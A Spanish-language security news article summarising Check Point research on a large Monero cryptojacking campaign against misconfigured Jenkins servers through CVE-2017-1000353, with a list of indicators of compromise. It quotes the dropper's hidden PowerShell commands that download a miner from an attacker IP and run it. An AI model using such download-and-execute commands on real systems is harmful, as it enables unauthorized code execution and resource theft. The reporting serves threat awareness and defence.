El equipo de CheckPoint ha descubierto la que puede ser la mayor operación de minado de criptomonedas: el equivalente a más de 3 millones de dólares de la criptomoneda Monero (XMR) han sido generados utilizando la capacidad de procesado de miles de servidores Jenkins mal configurados.
Jenkins es un popular software de integración continua (CI) de código abierto escrito en Java. Actualmente es mantenido por la comunidad y por el proveedor de servicios de CD/CI CloudBees.
El grupo criminal, de origen chino, se ha valido de instalaciones mal configuradas o inseguras para instalar el troyano encargado de minar la criptomoneda.
Para inyectar el código malicioso, los atacantes aprovechan la vulnerabilidad etiquetada con CVE-2017-1000353que permitirá saltar restricciones de seguridad y ejecutar comandos en la interfaz CLI de Jenkins:
- Primero se comprueban las capacidades y permisos del cliente víctima.
- En función de la respuesta anterior, se inyecta el payload que contiene entre otras cosas el código encargado del minado de la criptomoneda.
Inyección del código malicioso. Fuente: https://research.checkpoint.com |
Esta segunda fase del ataque es la más interesante:
- Primero se ejecuta una instancia de PowerShell en segundo plano: powershell.exe -WindowStyle Hidden:
- Se declara un objeto de tipo web-client: $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT
- El dropper descarga el software encargado del minado: $P.DownloadFile(‘http://222.184.79.11:5329/minerxmr.exe’, ‘C:\\Windows\\minerxmr.exe’)
- Para posteriormente ejecutarlo con el comando: START C:\\Windows\\minerxmr.exe
Los atacantes están bien organizados y distribuyen las operaciones de minado entre diferentes ‘pools’. Sin embargo, todas las ganancias están centralizadas en una única cartera, que al momento de escribir la noticia, supera ya los 10829 XMR. El equivalente a unos 2,75 millones de euros al cambio.
Algunos IOCs:
Dominios e IP:
- 222[.]184[.]79[.]11
- 183[.]136[.]202[.]244
- btc[.]poolbt[.]com
- shell[.]poolbt[.]com
- xmr[.]btgirl[.]com[.]cn
- btc[.]btgirl[.]com[.]cn
Muestras:
SHA256: 0bb4503cc52530ddadb102fa4010fb4d89af88aca846d4b16f601d0702134246
SHA256: 06f8eda46fd6bdc11b8ec4d18a0f0afbf3d47f82cea8363d342975896582a715
SHA256: f0430130a2f3549b1aeff0a9fb2246f68f585a7c1d312c7be385a1cf5f37e70d
SHA256: c87d294cb0384cb56f4829d58cdd3f53572d3f95c2133a9b1da5f5bc1710f22f
SHA256: f750d6da918a5f2f2c442a339821ffebcad4b61e4ca1684bac0e7df98416a794
SHA256: 3002551eebaf486d77a2b81d87db553ad8632bb132553e306395c5da589171fe
SHA256: 213a23219ff89c412f92aa1fdf7152178a81514014ee1cc4ffee97e725ee63a3
SHA256: ff8c97cd55523cbdceef80407269d35bbf78abcbf807426c12d9debe1ce498d9
SHA256: 2beaa23907c40cfcb705844f4f515ff81a788abe1aed2c8d23626d9d735968ae
SHA256: b22fa98c3ee99222c4e827a9745f206ccf7cd40530459a92f183e148b0df5ce9